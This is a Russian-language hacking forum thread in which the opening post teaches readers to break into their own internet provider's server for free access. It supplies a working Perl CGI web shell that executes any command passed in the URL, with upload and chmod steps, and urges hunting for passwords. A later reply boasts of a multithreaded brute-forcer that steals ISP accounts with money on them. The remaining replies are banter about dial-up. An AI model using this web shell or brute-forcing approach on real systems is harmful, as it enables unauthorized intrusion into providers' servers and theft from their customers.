Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 03-05, 16:12

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 9 ] 
Автор Сообщение
СообщениеДобавлено: 15-03, 09:51 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 04-03, 17:17
Сообщения: 162
Откуда: Челябинск
Здравствуйте форумчане!
Все мы выходим в инет. Кто-то по выделенке, а кто-то юзая модем и телефонную линию (Dial-up). У всех есть свой провайдер, но далеко не каждый предоставляет халявный инет .
Такого нехорошего провайдера нада ломать дабы насладиться халявой.
Все провайдеры также деляться на тех, кто с охотой и без злого умысла предоставляет тебе шелл-аккаунт (для тех, кто в танке: шелл - это удалённое администрирование сервака твоего прова, с помощью какой либо программы-диалога, например /bin/bash) и на тех, кто их не предоставляет ни за какие деньги (мне не повезло, мне попался именно такой пров). Но даже в этом случае не надо отчаиваться. Итак, провайдер тебе предоставил 10 мегабайт под твою личную домашнюю страничку и Ftp-аккаунт. Это нам и необходимо.
Тебе нужно написать perl-скрипт для управления серваком твоего провайдера (подразумевается, что в качестве www-сервера у твоего прова установлен Apache&perl: наиболее популярный вариант). Не бойся, написать его очень просто. Окрывай блокнот aka notepad.exe и набивай туда текст:


#!/usr/bin/perl
print "Content-type: text/htmlnn";

$cmd=$ENV{QUERY_STRING}; # Присваиваем переменной "cmd" аргументам скрипта.
@tmp=split(/%20/,$cmd); # Заводим массив "tmp" в котором хранятся разбитые по пробелам строки из переменной "cmd".
$cmd=join(" ",@tmp); # Обновляем переменную "cmd", заменяя все закодированные броузером пробелы (%20) на обычные.
@output=`$cmd`; # Выполняем команду "cmd" на сервере и записываем её результат в массив "output".

print "

n";

foreach (@output) {
print "$_"; # Выводим результат на экран.
}

print "
";


Сохрани это чудо под именем "test.pl" и залей его на сервер в в ascii-режиме (иначе ничего работать не будет). Чтобы перейти к ascii-режиму, отправляй команду Ftp-серверу: "TYPE A".

Всё просто. Скрипт выполняют команду, которая передаётся через QUERY_STRING. Но, перед тем как протестировать скрипт, нужно сделать его исполняемым. Для этого смени его атрибуты на "755" (если не можешь найти, где сменить их, отправь команду "site chmod 755 test.pl" на Ftp-сервер.

Если всё прошло удачно, запускай броузер и набирай в нём: "http://www.your_provider.com/путь_к_директории_скрипта/test.pl?whoami". Скрипт должен выдать одно слово "nobody" (если конечно тупой админ не запустил www-сервер на рут-правах ). Если на экране ничего не появилось, либо появилось сообщение об ошибке 500, значит ты допустил ошибку в скрипте. Если вылезла ошибка 403, то на скрипте нет атрибута выполнения.

Итак, теперь ты можешь удалённо управлять сервером твоего провайдера. Фантазия тут безгранична. Лазай по FTP прова, ищи пароли, скрипты и прочие интересные вещи.=)
С уважением ARMED.

_________________
Сунетесь к лучшим-умрете всей кучей!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 12:49 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 22-12, 21:31
Сообщения: 102
Откуда: UA
Это было давно и уже не правда ....


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 16:20 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 04-03, 17:17
Сообщения: 162
Откуда: Челябинск
Спс Обосрал=(

_________________
Сунетесь к лучшим-умрете всей кучей!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 18:39 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 22-12, 21:31
Сообщения: 102
Откуда: UA
Ну извени конечно. Но мой диалаповский модем уже мышки схавали. Кокой диалап? Мой дед уже DSL юзает.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 18:42 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 04-03, 17:17
Сообщения: 162
Откуда: Челябинск
Есть у некоторых Диалап,я как минимум 5 человек знаю=)

_________________
Сунетесь к лучшим-умрете всей кучей!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 18:59 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 22-12, 21:31
Сообщения: 102
Откуда: UA
А денозавры в тех краях не бегают ? :wink:

Я не знаю. Наша АТС новых на диалап больше не принемает. Всех на DSL.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 15-03, 19:05 
Не в сети
Advanced AH-user
Аватара пользователя

Зарегистрирован: 04-03, 17:17
Сообщения: 162
Откуда: Челябинск
Цитата:
А денозавры в тех краях не бегают ?

Флуууд=)))
Нет бывает Деды с Диалапами бегают=)

_________________
Сунетесь к лучшим-умрете всей кучей!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 21-12, 21:47 
Не в сети
Starting AH-user
Аватара пользователя

Зарегистрирован: 09-12, 22:06
Сообщения: 20
Armed Я думаю этот способ уже давно не октуален


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 28-12, 00:57 
Не в сети
<b><font color=blue>Moder</b></font>

Зарегистрирован: 30-10, 08:41
Сообщения: 65
у мя диалап :))) и што? ) выделенка была, ща временные финансовые затруднения :)

мой проф ломается оч легко за час написал простенький брутер на делфях, юзающий винсок... работает с патоками :) так что если естьв оображение то за час-два можно 2-3 акка срубить с суммами от 3-ех до 10-ти и выше $ :)
единственный пров, не проверяющий количество введенных неправильных логин\паролей и проверки по IP!


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 9 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB